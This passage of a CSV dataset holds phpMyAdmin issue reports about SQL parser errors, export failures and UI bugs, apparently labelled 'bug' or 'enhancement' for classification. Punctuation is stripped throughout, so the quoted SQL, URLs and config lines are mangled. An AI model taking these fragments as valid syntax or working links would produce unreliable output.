Server info http imgur.com 5bEWQwh","bug"
"24444","11628","INSERT ... ON DUPLICATE KEY.
Syntax flagged as error by the parser.
See http dev.mysql.com doc refman 5.7 en insert on duplicate.html and http stackoverflow.com questions 33407551 on duplicate key unrecognized in phpmyadmin.","bug"
"24444","11630","mysqli fetch array ) expects parameter 1 to be mysqli result, boolean given.
mysqli fetch array ) expects parameter 1 to be mysqli result, boolean given This report is related to user submitted report [ 15600] https reports.phpmyadmin.net reports view 15600) on the phpmyadmin error reporting server.","bug"
"24444","11631","Linter warnings when creating new user.
I discovered this by creating a new user and clicking to Edit the SQL, but the problem occurs if I just enter the same SQL in to the SQL tab.
The statements are <pre> CREATE USER b a IDENTIFIED WITH mysql native password; GRANT USAGE ON .
TO b a REQUIRE NONE; SET PASSWORD FOR b a = ; < pre> The first line gives an Unrecognized statement type near WITH, The GRANT lines give an Unrecognized statement type near GRANT, Finally the SET PASSWORD give Unrecognized keyword near FOR, unexpected token near b a , unexpected token near =, and unexpected token near","bug"
"24444","11632","Exporting GIS visualization ignores start and row count.","bug"
"24444","11633","CodeMirror tooltip shows below modal window.
Hi, in this release and 4.5.0.2 too, when I m creating triggers, error icons appears on left, but on mouseover is tooltip shown below window, so, it s invissible to users.
!
[tooltips problem] https cloud.githubusercontent.com assets 15624125 10901405 054afa5e 81ee 11e5 8208 993521ed3311.PNG)","bug"
"24444","11634","May you please add full text of show create table at print table page?.
tbl printview.php May you please add full text of show create table at print table page?
This will be fine for who want to show full table struct and create table sql command","bug"
"24444","11635","Sql not executed properly.
The following insert SQL will not work CREATE TABLE `tbldepartment csvdelimiter` `ID` int 11) NOT NULL, `b` varchar 10) DEFAULT NULL, `c` varchar 51) DEFAULT NULL, `d` int 3) NOT NULL DEFAULT 0 ) ENGINE=MyISAM DEFAULT CHARSET=utf8; INSERT into tbldepartment csvdelimiter ID,b,c,d) values 1 , 2 , 3 , 4 ); if The tablename does not end with delimiter the insertation will work fine.
Else it will produce error Unrecognized statement type because it somehow truncates the SQL syntax and will only read the SQL from the word values onwards.
cheers Patrick","bug"
"24444","11637","[4.5.1] The AS from de main table of the query is being deleted when you are exporting a query.
I executed SELECT max mi.nrotrans) as hola FROM `DW mvsitems` AS mi JOIN DW transac AS t ON t.nrotranselim = 0 AND t.act mvsitems = 0 AND t.act stock = 0 AND t.nrotrans = mi.nrotrans) GROUP BY mi.coditm But when I export the query with the button it s at the bottom of the result table) it exports this query SELECT max nrotrans) as hola FROM `DW mvsitems` JOIN DW transac AS t ON t.nrotranselim = 0 AND t.act mvsitems = 0 AND t.act stock = 0 AND t.nrotrans = nrotrans) GROUP BY coditm In my case, it ends in an error because both tables DW mvsitems DW transac) have the column nrotrans so it s ambiguous.
Here are some screenshots http i.imgur.com iZIEIhs.png http i.imgur.com 0XNWCvk.png http i.imgur.com xFnpuYv.png Server info http i.imgur.com J8HspDB.png","bug"
"24444","11638","Stable version does not load on PHP7 nginx.
Is there any support for PHP7 in the stable branch?
I tried to get it to work multiple times but this nginx error.
.
I checked .
and here is the error.
.
I am getting this error only for phpmyadmin.
I have no problem with nginx or file permissions.","bug"
"24444","11639","This is a bug with the MainBackground Color.
This MainBackground color no longer seems editable, it doesnxe2x80x99t change anything but the background of the input boxes in the main area.
Something seems to be bugged about this setting now after an update no that long ago I believe.
The screenshots of the themes show the background being edited on some of them so Ixe2x80x99m sure itxe2x80x99s supposed to be working.
Just wanna make it darker ?
If you are wondering what theme don t wonder which one because this applies to ALL the themes I tried about 5 and a few of them had SOLID backgrounds in the preview image which is why I was testing them )","bug"
"24444","11641","Ability to disable the navigationhiding Feature.
It would be nice to have an option in the user settings and global) to disable the navigationhiding Feature.
I find it more annoying than useful and I don t see any option to disable it but to not set cfg[ Servers ][ i][ navigationhiding ].
Then phpmyadmin always displays the error about not having set the advanced config.","enhancement"
"24444","11642","Possible invalid URL when session expired.
The ``js ajax.js`` and ``js navigation.js`` both contain following code ``js window.location.href = session expired=1 ; `` This produces invalid URL in case the current URL doesn t contain any parameters eg.
was POST request, like for export import it can end up being `` phpmyadmin import.php session expired=1``).
See also https bugs.debian.org cgi bin bugreport.cgi?bug=803483","bug"
"24444","11643","Filter in Left Panel.
This is more of a feature request than anything.
I use a filter box to select a few tables to work on.
When I edit the structure of one of the tables, the whole panel refreshes and forgets the filter.
It would be awesome to remember the filter.
Thanks for the wonderful updates.
Regards Cyril","enhancement"
"24444","11646","Unrecognized keywords.
From http stackoverflow.com questions 33556442 mysql phpmyadmin query not working unrecognized keyword not Tested on 4.5.1.
This is fine .
but this gives 3 warnings .","bug"
"24444","11647","Notices when setting NavigationTreeDbSeparator to an array.
With `NavigationTreeDbSeparator` set to`array , )`, the following notices are reported Notice in .
libraries navigation NavigationTree.php 177 Notice in .
libraries navigation nodes Node.php 441 Notice in .
libraries navigation nodes Node.php 451 Notice in .
libraries navigation nodes Node.php 453 Notice in .
libraries navigation nodes Node.php 607","bug"
"24444","11648","[4.5.1] Notice in .
export.php 214 Undefined index quick or custom solution.
In Version 4.5.1, if config.inc.php contains cfg[ Export ][ method ] = custom no form ; to avoid the Quick Custom radio buttons for Export, the following pops up >Notice in .
export.php 214 >Undefined index quick or custom This annoyance can be solved simply by changing export.php line 214 Is it a quick or custom export?
if REQUEST[ quick or custom ] == quick ) { to Is it a quick or custom export?
if isset REQUEST[ quick or custom ]) REQUEST[ quick or custom ] == quick ) { A more complicated alternative would be to change display export.lib.php and export.js to show the custom options and include a hidden `quick or custom` input with value `custom`.","bug"
"24444","11649","Settings change default first day of week.
Hi dear PMA team.
Could you please implement into PHPMyAdmin settings option for set up first day of week?
For me is default Sunday) little bit confusing when inserting editing datetime data.
Thanks to Marc Delisle for info about how to edit this setting manually stackoverflow)","bug"
"24444","11651","Issue while creating tables.. Current Version 4.4.1.1 While I am creating tables using the pma GUI, whenever I add more rows to the table, it shows a field in the bottom called Connection which forces you to fill it, when I don t want to add anything to it.
Could you please remove it as required?
At the moment, the workaround I am using is by removing the required attribute using the inspect element tool.
Thank you.","bug"
"24444","11652","Issue with some tables.
Version 4.4.1.1 I get an issue when I view my tables, this is the errors I see in the bottom .
Hoping that you will fix it, Thanks, Hassan Althaf.","bug"
"24444","11653","ForceSSL is not working as expected.
I wanted to enable redirecting HTTP to HTTPS when users access phpMyAdmin path.
So, I edited config.inc.php and set ForceSSL to true.
When I access the path http www.mydomain.com pma instead of getting the https www.mydomain.com pma and page switches to a SSL connection I am getting http www.mydomain.com ?SID= SID.
Page content shows error This webpage has a redirect loop.
ERR TOO MANY REDIRECTS in Chrome.
Accessing directly the path using https www.mydomain.com it is working as expected.
In my opinion redirecting feature inside phpMyAdmin has an issue.","bug"
"24444","11654","Use a slider for Internal relations.
In table > Structure > Relation view, the internal relations dialog is probably not commonly used and could be hidden inside a slider.
I welcome other opinions.
Target version 4.6.","enhancement"
"24444","11655","Exporting a query fails if query has a replace in the select statement.
I have a query I have used for awhile, which works fine, but when the result is exported, the export fails with an HTML message.
The problem seems to be the replace in the Select.
If I remove the Replace, it works fine.
The version is 4.5.0.2 SELECT REPLACE SUBSTRING INDEX SUBSTRING INDEX vss media.folder path, , 2), ,1), , ) AS Club , REPLACE SUBSTRING INDEX SUBSTRING INDEX vss media.folder path, , 1), ,1), , ) AS Team, .... With the replace, you get the following HTML snippet <div class= error ><h1>Error< h1><p><strong>Static analysis < strong>< p><p>1 errors were found during analysis.< p><p><ol><li>An expression was expected.
near at position 0)< li>< ol>< p><p><strong>SQL query < strong> <a href= .
url.php?url=http 3A 2F 2Fdev.mysql.com 2Fdoc 2Frefman 2F5.5 2Fen 2Fselect.html target= mysql doc ><img src= themes dot.gif title= Documentation alt= Documentation class= icon ic b help >< a><a href= tbl sql.php?sql query=SELECT vss media.sys name 2C vss order info.order id 2C vss billing address.first name 2C vss billing address.last name 2C vss billing address.email 2C vss order details.product name FROM amp;show query=1 amp;db=shiera stockbox amp;table=vss media amp;token=efa6758e0321e4e75c9212de2d63c036 ><span class= nowrap ><img src= themes dot.gif title= Edit alt= Edit class= icon ic b edit > nbsp;Edit< span>< a> < p> <p> SELECT vss media.sys name vss order info.order id vss billing address.first name vss billing address.last name vss billing address.email vss order details.product name FROM < p> <p> <strong>MySQL said < strong><a href= .
url.php?url=http 3A 2F 2Fdev.mysql.com 2Fdoc 2Frefman 2F5.5 2Fen 2Ferror messages server.html target= mysql doc ><img src= themes dot.gif title= Documentation alt= Documentation class= icon ic b help >< a> < p> <code> 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1< code><br >< div>","bug"
"24444","11657","phpMyAdmin website down?.
I cant access the website at http www.phpmyadmin.net.
Can you let me know whats going on?","bug"
"24444","11658","Collation column is empty in table Structure.
in the table structure view the collation column is empty if you edit a column there you will see the collation but on the table structure layout page the collation is empty for example take a look here http demo.phpmyadmin.net master config tbl structure.php?db=world table=Country token=5037d234639494817a751ff9d75114d7","bug"
"24444","11659","Feature request totally turn off autocomplete and sql syntax check.
Please add an ability to totally turn off autocomplete now I can turn off only table names and fields).
And also turn off SQL syntax check.
The autocomplete is unusable for me and disturbs me when I edit a query.
Syntax check cause additional requests to web server.
I have very slow connection remote to databases and every query takes too much time because of waiting for additional http queries to be completed.","bug"
"24444","11660","Row encoding column always empty.
Last few releases I see that row encoding column in the Structure tab is always empty.
Not depend on table and or row encoding.
!
[79] https cloud.githubusercontent.com assets 1829515 11111875 b31d4e52 8950 11e5 870d a55d1886a7bb.png)","bug"
"24444","11661","Error changing table s column encoding.
PhpMyAdmin fails trying to change column s encoding.
Look attachments Source row format !
[80] https cloud.githubusercontent.com assets 1829515 11111970 aa48b98c 8951 11e5 815c 12e2bd379d38.png) Trying to change the row encoding to utf8 unicode ci !
[81] https cloud.githubusercontent.com assets 1829515 11111978 bc9f4aec 8951 11e5 9b2f 49cc3b3d158b.png) Hmm, I didn t asked any BLOBs, why it tries to use blob????
Ok, try to preview SQL !
[82] https cloud.githubusercontent.com assets 1829515 11111991 de1d6fb4 8951 11e5 97ed 141b96a86da1.png) It is the correct SQL query without any blobs!
Why PhpMyAdmin tries to use blobs???
If I copy this correct query and execure it everything is going correct, the row encoding changed.","bug"
"24444","11664","Online syntax verifier bug IF on SELECT statement.
Query SELECT coditm AS Item, descripcion AS Descripcion, contenedores AS Contenedores, IF suspendido=1, Si , No ) AS Suspendido FROM `DW articulos` WHERE superado = 0 The query is executed successfuly.
!
[captura de pantalla de 2015 11 12 10 44 30] https cloud.githubusercontent.com assets 9610178 11119789 bb6cb816 892a 11e5 9856 951cd73094df.png) !
[captura de pantalla de 2015 11 12 10 46 25] https cloud.githubusercontent.com assets 9610178 11119790 bb6d337c 892a 11e5 9184 066c5c2d16e3.png)","bug"
"24444","11665","Format breaks query with COUNT ).
This query works .
After pushing Format button, it becomes .
and give this error > MySQL said Documentation > 1630 FUNCTION mysql.COUNT does not exist.
Check the Function Name Parsing and Resolution section in the Reference Manual My configuration Database server Server via TCP IP) Server type MySQL Server version 5.6.23 MySQL Community Server GPL) Protocol version 10 User Server charset UTF 8 Unicode utf8) Web server Apache 2.4.16 Unix) OpenSSL 0.9.8zg Phusion Passenger 5.0.20 Database client version libmysql mysqlnd 5.0.11 dev 20120503 Id 15d5c781cfcad91193dceae1d2cdd127674ddb3e PHP extension mysqli Documentation PHP version 5.5.29 phpMyAdmin Version information 4.5.1 up to date) Git revision c1bc737 from STABLE branch, committed on Oct 23, 2015 at 09 21 PM by Marc Delisle","bug"
"24444","11666","NOT EXISTS is not working.
database schema and sample data .
this query is not working on http demo.phpmyadmin.net STABLE database find gaps, table arrc vouchers) .
and give this error > Static analysis > > 3 errors were found during analysis.
> > 1.
Unrecognized keyword.
near NOT at position 145) > 2.
Unrecognized keyword.
near EXISTS at position 149) > 3.
Unexpected token.
near at position 156) > > SQL query > > SELECT t1.id 1) as gap starts at, SELECT MIN t3.id) 1 FROM arrc vouchers t3 WHERE t3.id > t1.id) as gap ends at FROM arrc vouchers t1 WHERE NOT EXISTS LIMIT 0, 25 > > MySQL said > > 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near LIMIT 0, 25 at line 1 but it works on phpmyadmin 4.3.11","bug"
"24444","11667","Disable the tooltip in the navigation panel s filter box.
in the left panel navigation tree when you start searching for a database name you get an annoying tooltip.
Please disable the tooltips by default.","bug"
"24444","11668","Table header is empty with browsing an empty table.
currently, the browse tab which is also the default tab) does not display any information when selected on empty tables, other than showing up a message saying MySQL returned an empty result set i.e.
zero rows).
Query took 0.0003 sec) .
at least we can show a table header row with all the columns listed in their respective order so that anyone selecting different tables from left panel need not click again on Structure tab to see the columns.
currently there is no way one can see the table header row of an empty table and on the other hand, we are wasting default tab s valuable screen with no information about the table being displayed.","enhancement"
"24444","11669","Can t edit rows if table name has one upper case char OS X).
For example, importing this database .
If I try to modify the first row, phpmyadmin generates this query .
And shows this pop up > This table does not contain a unique column.
> Features related to the grid edit, checkbox, > Edit, Copy and Delete links may not work after saving.
I can edit database 1 rows using MysqlWorkbench or Valentina Studio.
This second database, with the table name all lower case, works for me .
This is my my.cnf file .
My configuration Os Mac OS X 10.11.1 Database server Server via TCP IP) Server type MySQL Server version 5.6.23 MySQL Community Server GPL) Protocol version 10 User root localhost Server charset UTF 8 Unicode utf8) Web server Apache 2.4.16 Unix) OpenSSL 0.9.8zg Phusion Passenger 5.0.20 Database client version libmysql mysqlnd 5.0.11 dev 20120503 PHP extension mysqli Documentation PHP version 5.5.29 phpMyAdmin Version information 4.5.1 up to date) Git revision c1bc737 from STABLE branch, committed on Oct 23, 2015 at 09 21 PM by Marc Delisle","bug"
"24444","11670","its displaying the code instead of using it this is what shows up.
http pastebin.com 6pzgy9Bs","bug"
"24444","11672","NOT EXISTS clause not recognized MySQL 5.6 and 5.7).
phpmyadmin version 4.5.1.
I try with simple SELECT from table1 p where not exists SELECT FROM table2 s WHERE s.id1 = p.id) it work when run directely in mysql command.
I fix it by adding NOT EXISTS in all sql parser context ContextMySql50600.php,...) and NOT EXISTS in OPERATORS in Condition.php","bug"
"24444","11674","Error tooltip hidden.
When I create edit a stored procedure, the tooltip indicating the error message is hidden behind the procedure editor panel.
I cannot read the error message.
Version 4.5.1.
Browser Google Chrome !
[phpmyadmin] https cloud.githubusercontent.com assets 15891137 11213476 369ccde0 8d0a 11e5 9ed7 5fdd9c79866f.jpg)","bug"
"24444","11677","sql parser and php gettext collide..
Both libraries provide an ` )` in the global namespace.
1 of them checks if ) is already defined, but the other doesn t. Current master branch doesn t include them in the right order and this causes 500 errors on all pages can t redeclare already declared function).
On a side note, is php gettext still needed?
A more generic question composer.json doesn t list any dependencies but instead they are copied into the libraries directory.
Is there any plan to actually use composer for dependency management?","bug"
"24444","11678","SELECT WHERE NOT EXISTS problem.
When I have a query like SELECT FROM table1 WHERE NOT EXISTS SELECT FROM table2 WHERE table1.id=table2.id) I get Error Static analysis 3 errors were found during analysis.
Unrecognized keyword.
near NOT at position 27) Unrecognized keyword.
near EXISTS at position 31) Unexpected token.
near at position 37) SQL query SELECT FROM table1 WHERE NOT EXISTS LIMIT 0, 25 MySQL said 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near LIMIT 0, 25 at line 1 As it can be seen there is some incorrect insertion replacement with LIMIT happening.
phpMyAdmin Version information 4.5.1","bug"
"24444","11679","Cannot export results of some queries.
Seen in 4.5.0 to 4.5.2.
Test case .
Run this query .
then Query results operations > Export.
We don t reach the export dialog.","bug"
"24444","11680","NOT EXISTS clause not recognized.
Similar to issue 11518, I believe the NOT EXISTS clause isn t recognized.
.","bug"
"24444","11681","possible) bug in js messages.php.
in a rush so leaving an issue rather than pull requesting i was getting 500 internal server errors on phpmyadmin under mac os x mamp pro), when the code was calling js messages.php.
it made phpmyadmin unusable.
a bit of debugging led me to the lines .
where i noticed a single underscore ` )` instead of a double ` )` was being used.
when i changed to using double all was fine cheers","bug"
"24444","11682","Remote Connection to MySql.
Hi, trying to connect remote and i did successful with my hosting mysql using config.inc.php but for connectioning to one more mysql i need to install another phpmyadmin to install and again configuring the config.inc.php My Question is There is any way so that my phpmyadmin ask for host ,port, user and password at login time","bug"
"24444","11683","Should code refactoring to MVC in the schedule.
is code refactoring to MVC and Single entry in the schedule even separate the core code into a phpmyadmin framework","bug"
"24444","11684","mysql native password with MariaDB bug.
So I checked this thread https github.com phpmyadmin phpmyadmin issues 11520 but there is a bug in phpmyadmin.
If you create new user through phpmyadmin this is the syntax that is used CREATE USER test localhost IDENTIFIED VIA mysql native password USING ; And it works.
But when you login with that username and change password it says changed but it really is not.
If you logout and login with new password you will fail.
You cannot login with new password but with old one you can.
This is shown in the log 21 37 08 [Warning] user entry test localhost has both a password and an authentication plugin specified.
The password will be ignored.
If you delete in mysql.user of the user test field plugin, then new password is working.
Any idea?","bug"
"24444","11685","Warning Invalid argument supplied for foreach ).
Invalid argument supplied for foreach ) This report is related to user submitted report [ 16376] https reports.phpmyadmin.net reports view 16376) on the phpmyadmin error reporting server.","bug"
"24444","11687","Delimiter missing while exporting multiple db routines.
PMA version 4.5.2 issue does also exists in 4.5.1) I have 2 routines in my db.
In case I export multiple routines the generated SQL won t execute in the newer db.
This is because PMA generates without delimiters.
Using the Tables export db export.php) method delimiters are added.
That is okay.
How to reproduce Go to DB routines list =db routines.php) Select at least two routines Choose Export option In dialog, the SQL queries for the routines are shown without delimiters.","bug"
"24444","11688","Proposal decrease cookies usage.. Current phpmyadmin using cookies for auth type by default.
But phpmyadmin take lot s of cookies.
it will use at least 10 cookies.
That s too much.
because the per domain cookie limit only 20. .
We can decrease cookie by merge cookie into json style value or other ways to do this.
2 3 cookies will be good.","enhancement"
"24444","11690","FLUSH word not recognized by parser.
In SQL window .
the word FLUSH is red underlined and a red cross appears on the left.
My configuration .","bug"
"24444","11691","Query was empty on creating User in 4.5.2.
I ve noticed the same issue as 11555 in Version 4.5.2.
If I create a new user I get the error message shown below.
I m running Percona Server Version 5.6.27.
This issue happens since PMA version 4.5.0.1, 4.5.0 runs without any problems.
!
[issue 2] https cloud.githubusercontent.com assets 13310563 11401562 626541f2 9393 11e5 88ab c56a2aeca709.jpg) !
[issue 1] https cloud.githubusercontent.com assets 13310563 11401563 62679448 9393 11e5 81db 96327bdf6648.jpg)","bug"
"24444","11693","Flush privileges overusage related to 11597.
I reported an issue earlier 11597) related to huge binary log growth.
This was resolved thanks, lem9!).
However, I m still seeing heavy usage of FLUSH PRIVILEGES by phpMyAdmin in my logs, after upgrading to 4.5.2.
This generates a decent amount of data in the binary logs since it s being executed on each page load.","bug"
"24444","11694","Displaying table of records.
Hello phpMyAdmin team, starting with version 4.5.0 I have little problem with display screen.
When I click to show table records, first what I everytime see is configuration tab browse tab) with configuration form.
Every time I have to slide down to see the records, it s somehow possible to close this tab or disable this tab ?
It s unpleasantly to scroll this setting everytime, I am using Chrome browser with Metro theme.
Thank you.
Jan.
I am new there, last time I post about phpMyAdmin on SourceForge, so be patient with me ) .","bug"
"24444","11695","PMA getDataForDeleteUsers ) warning.
Invalid argument supplied for foreach ) This report is related to user submitted report [ 17146] https reports.phpmyadmin.net reports view 17146) on the phpmyadmin error reporting server.","bug"
"24444","11698","Cannot create user on Percona Server.","bug"
"24444","11699","REPLACE ) function confused with REPLACE statement.
I am keeping the same title from [bug 4718] https sourceforge.net p phpmyadmin bugs 4718 ), because it looks the same issue to me.
I am running phpMyAdmin 4.5.1 at a hosted Windows Server aspnix.com) and tried to run the query bellow .
The automatic validation showed bizarre errors !
[capture] https cloud.githubusercontent.com assets 1518676 11449201 b1392c1e 9553 11e5 9447 2dbfbf299f73.jpg) The simulated query showed the error below > 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ) at line 1 But the query ran fine when I clicked GO.
The issue seems related with validation for `REPLACE` and `NOT`, at least for my case.
Removing those keyword functions also remove the errors from Simulate Query.
Thanks.
I hope I did this bug reporting right.
Please forgive me if I did something wrong.
I you need further information, I will be happy to provide).","bug"
"24444","11700","Bug with table names containing uppercase letters Windows 10).
when create table with uppercase letters some pages not working like operations or relation view here is screenshots for these two pages !
[image] https cloud.githubusercontent.com assets 14242054 11451818 aaefa5b2 95db 11e5 8466 dde21c21f946.png) !
[image] https cloud.githubusercontent.com assets 14242054 11451786 c54be160 95da 11e5 9b51 079926358081.png) steps to produce the issue 1. create new table having uppercase letters 2. select operations or relation view to resolve the issue just change the table name in the url to lowercase example change http phpmyadmin tbl relation.php?db=test table=TEST to http phpmyadmin tbl relation.php?db=test table=test note anchor tag in the the left navigation bar have the lowercase name of the table so clicking on it will resolve the problem too","bug"
"24444","11701","stored procedure updating.
a) Need a way to change parameter order without completely re keying in parameters in new order drag drop handles?)
b) an advanced editor option toggle would be nice... give the user the option to edit full create statement not just the bit between begin and end) similar to mysql workbench)","enhancement"
"24444","11702","Extraneous message after edit grid edit.
Seen in 4.5.2.
Browse a table, then click Edit for a row, make some change and click on Go.
Then double click on some data and change it.
You see the messages for the two UPDATE statements.","bug"
"24444","11705","Error code 200 when loading table s structure Windows 10).
When I view a table s structure, PMA gives me this error in a red popup > Error in Processing Request Error code 200 Error text OK PhpMyAdmin version 4.5.2 Windows 10 Pro 64bit Apache 2.4.17 Win32) PHP 5.6.14 MySQL Community Server 5.7.9 I must refresh the page f5) to get it works!","bug"
"24444","11706","database export template not saving compression option.
template always loads with option set to zipped updating with none has no effect.","bug"
"24444","11707","4.5.2 hangs HHVM with 100 cpu usage.
the issue is intermittent and after a while it goes away entirely.
things that trigger it login, every single time viewing a table, intermittent editing a column, intermittent changing user password via usermanager, intermittent https github.com facebook hhvm issues 6429 I have been able to reproduce the issue on every single server i ve tested.","bug"
"24444","11708","Add a flag to remove root with no password warning.
You are connected as root with no password, which corresponds to the default MySQL privileged account.
Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole by setting a password for user root .
Add a flag to the conf file so I could hide that warning.
1.
It s not a security hole.
I have a dev server which absolutely has no secure data and setting a password to the mysql doesn t make sense.
2.
I don t wanna see that warning, since it s not a security hole see 1.)","bug"
"24444","11710","Unable to add remove `on update CURRENT TIMESTAMP` option while editing a timestamp field.
Seen in master branch","bug"
"24444","11711","Clarify the meaning of Stand in structure for view in SQL export.
When exporting a database containing views, the views are exported as tables even if the Export views as tables box is unchecked.
This does not happen when exporting views individually they respect the checkbox properly.
Unfortunately this means that a full database export will not contain views, making it a pain to dump them as a whole unit...
This is on 4.4.15.1, using the 1.el7 RPM for RHEL7.","enhancement"
"24444","11712","Browse Foreign Values Search broken across databases in 4.5.2.
Hi.
I have a foreign key constraint set up between varchars in PMA 4.5.2.
The Browse Foreign Values AJAX dialog works just fine when looking at column values in the same database, but doesn t work when the linked columns are in two databases.
This might be because only one database name is sent as post value in the AJAX request?
Is this bug easily fixable?
Thanks Evan","bug"
"24444","11713","Not receiving notifications for updates.
I m submitting this on behalf of someone else xe2x80x93 the person that submitted the question [phpMyAdmin no longer notifying me of updates] http webmasters.stackexchange.com questions 85452 phpmyadmin no longer notifying me of updates) to [Webmasters Stack Exchange] http webmasters.stackexchange.com ).
The current text of the question > I m used to seeing phpMyAdmin notify me of updates fairly frequently so when a few weeks went by without any notifications I headed over to the official site to discover that my installation was out of date.
> What I can t determine is why the notifications stopped.
I looked in my logs and it appears as if the version checking is still occurring > > [28 Sep 2015 12 31 00 0400] GET pma version check.php?
nocache=1443457870977619155 HTTP 1.1 200 2 > Yet no notifications are appearing.
If I run version check.php directly, I get a reply of `[]`.
> My config file consists of > i = 0; > i ; > cfg[ Servers ][ i][ host ] = 127.0.0.1 ; > cfg[ Servers ][ i][ port ] = ; > cfg[ Servers ][ i][ socket ] = ; > cfg[ Servers ][ i][ connect type ] = tcp ; > cfg[ Servers ][ i][ auth type ] = cookie ; > > cfg[ ForceSSL ] = true; > cfg[ DefaultLang ] = en ; > cfg[ ServerDefault ] = 1; > cfg[ PmaNoRelation DisableWarning ] = true; > cfg[ VersionCheck ] = true; > What can I do to get the notification working again?","bug"
"24444","11714","Slow table list.
hi, the table listing on the main page is totally slow, caused by DatabaseStructureController displayTableList ) on Line 444 https github.com phpmyadmin phpmyadmin blob master libraries controllers database DatabaseStructureController.php L443 getStatusInfo is called for each table which returns the same data as the foreach value contains.
Why there is a redundant call on getStatusInfo?
Removing the code from line 444 has reduced my loading times from 18 to 2 seconds.","bug"
"24444","11715","The phpMyAdmin configuration storage is not completely configured, some extended features have been deactivated.
Find out why.
.
Hello all, I m starting to use XAMPP on a MAC and when I accessed the phpmyadmin webpage it reported the following error, because of it I can t create any database or tables The phpMyAdmin configuration storage is not completely configured, some extended features have been deactivated.
Find out why.
Or alternately go to Operations tab of any database to set it up there.
I clicked at Find out why and the was the following error cfg[ Servers ][ i][ column info ] ... OK Displaying Column Comments Enabled Browser transformation Disabled Please see the documentation on how to update your column info table.
Documentation I clicked the question mark for more explanations, but they didn t help me because I kept receiving the message that the data base didn t exist, even though it did.
I m running the latest version of XAMPP 5.6.14 4) and the latest version of phpmyadmin 4.5.2 I found a lot of explanation using google, but nome of them helped me.
Can some help me to solve this problem?
Regards Alex","bug"
"24444","11717","Inline comments striped from stored procedure.... on import.
.
Export exports the comments Import strips the comments The stored procedure routine editor preserves the comments mySQL workbench somehow preserves the comments Parser issue?
Sorcery?","bug"
"24444","11719","Recaptcha v2 with HTTPS always wrong captcha.
When activating Recaptcha v2 I always get this error on submit Entered captcha is wrong, try again!
Digging around I found a few people having the same issue over HTTPS http stackoverflow.com questions 12015814 recaptcha not working on https http stackoverflow.com questions 29213706 phpmyadmin recaptcha https does not work Other factors that might be involved are The installation is using HTTPS from CloudFlare.
My network recently assigned me the computer trying to log in) a IPv6.
phpMyAdmin v4.5.2 PHP v5.6.16","bug"
"24444","11720","Message An account already exists... incorrectly displayed.
In User accounts > Edit privileges for one account) > Login Information, this message is displayed on entering the panel .
The goal is to warn about a conflict when creating an account, but here the user has just selected an account to possibly change login information.","bug"
"24444","11721","Export import of escaped single quote.
Hi, I have in my database a text field that contains an escaped single quote like this `\ `.
I made a dump of the prod database with phpmyadmin and imported it on my local database, but mysql answered that there was a syntax error at the next statement.
I reproduced te same behavior on my computer with the following script .
Observations PMA executes this SQL sucessfully.
PMA exports the value as .
and can t reimport it mysqldump exports it as .
and PMA is able to import it Versions PMA 4.5.2 mysql 5.7.9","bug"
"24444","11722","Excel import improper handling of dates times.
According to http stackoverflow.com questions 33949199 phpmyadmin import excel spreadsheet with date and time when phpMyAdmin is used to import an Excel file with date and time, the date and time are not properly imported.
Ideally we would improve this.","bug"
"24444","11723","syntax verifier is not knowing STRAIGHT JOIN .
Hello, using STRAIGHT JOIN triggers error messages of the syntax verifier.
Anyhow the query is executed sucessfully.
e.g.
<pre>SELECT `feeds`.`feed id`, `shops`.`shop id` FROM `feeds` STRAIGHT JOIN `shops` on `shops`.`shop id` = `feeds`.`shop id`;< pre> warnings <pre>Unrecognized keyword.
near STRAIGHT JOIN at position 57) Unexpected token.
near `shops` at position 71) Unrecognized keyword.
near on at position 79) Unexpected token.
near `shops` at position 82) Unexpected token.
near .
at position 89) Unexpected token.
near `shop id` at position 90) Unexpected token.
near = at position 100) Unexpected token.
near `feeds` at position 102) Unexpected token.
near .
at position 109) Unexpected token.
near `shop id` at position 110)< pre> Bes regards Michael","bug"
"24444","11724","live data edit of big sets is not working.
Hello, I am using the latest PMA 4.5.2.
Test case <pre> CREATE TABLE `test` `id` int 11) NOT NULL, `colors` set red , green , blue , yellow , black , white , brown , grey , pink , light red , light green , light blue , light yellow , light brown , light grey , light pink , dark red , dark green , dark blue , dark yellow , dark brown , dark grey , dark pink ) COLLATE utf8 unicode ci NOT NULL, `text1` varchar 255) COLLATE utf8 unicode ci NOT NULL, `text2` varchar 255) COLLATE utf8 unicode ci NOT NULL, `text3` varchar 255) COLLATE utf8 unicode ci NOT NULL, `text4` varchar 255) COLLATE utf8 unicode ci NOT NULL, `text5` varchar 255) COLLATE utf8 unicode ci NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8 unicode ci; INSERT INTO `test` `id`, `colors`, `text1`, `text2`, `text3`, `text4`, `text5`) VALUES 1, red,green,blue,yellow,black,white,brown,grey,pink,light red,light green,light blue,light yellow,light brown,light grey,light pink,dark red,dark green,dark blue,dark yellow,dark brown,dark grey,dark pink , This is a test.
This is a test.
This is a test.
This is a test.
This is a test.
This is a test.
, This is a test.
This is a test.
This is a test.
This is a test.
This is a test.
This is a test.
, This is a test.
This is a test.
This is a test.
This is a test.
This is a test.
This is a test.
, This is a test.
This is a test.
This is a test.This is a test.
This is a test.
This is a test.
, This is a test.
This is a test.
This is a test.This is a test.
This is a test.
This is a test.
); < pre> Now browse the table.
In the colors field of the only row existing in the table you will see sth.
like red,green,blue,yellow,black,white,brown,grey,pink,... .
Double click to live edit the colors of the row.
Now the pre selection is wrong.
It will only select all saved colors till [...].
The other ones chosen are missing.
Best regards Michael","bug"
"24444","11725","Issue tracker still pointing to source forge.
Issue tracker here https wiki.phpmyadmin.net pma Development Developer documentation still points to source forge.
This can be changed to https github.com phpmyadmin phpmyadmin issues.
Edit I think this is more relevant in https github.com phpmyadmin website issues","bug"
"24444","11726","Backup issue .
Full backup option is available but full restore option is not available","bug"
"24444","11727","SQL duplicate entry error trying to INSERT in designer settings table.
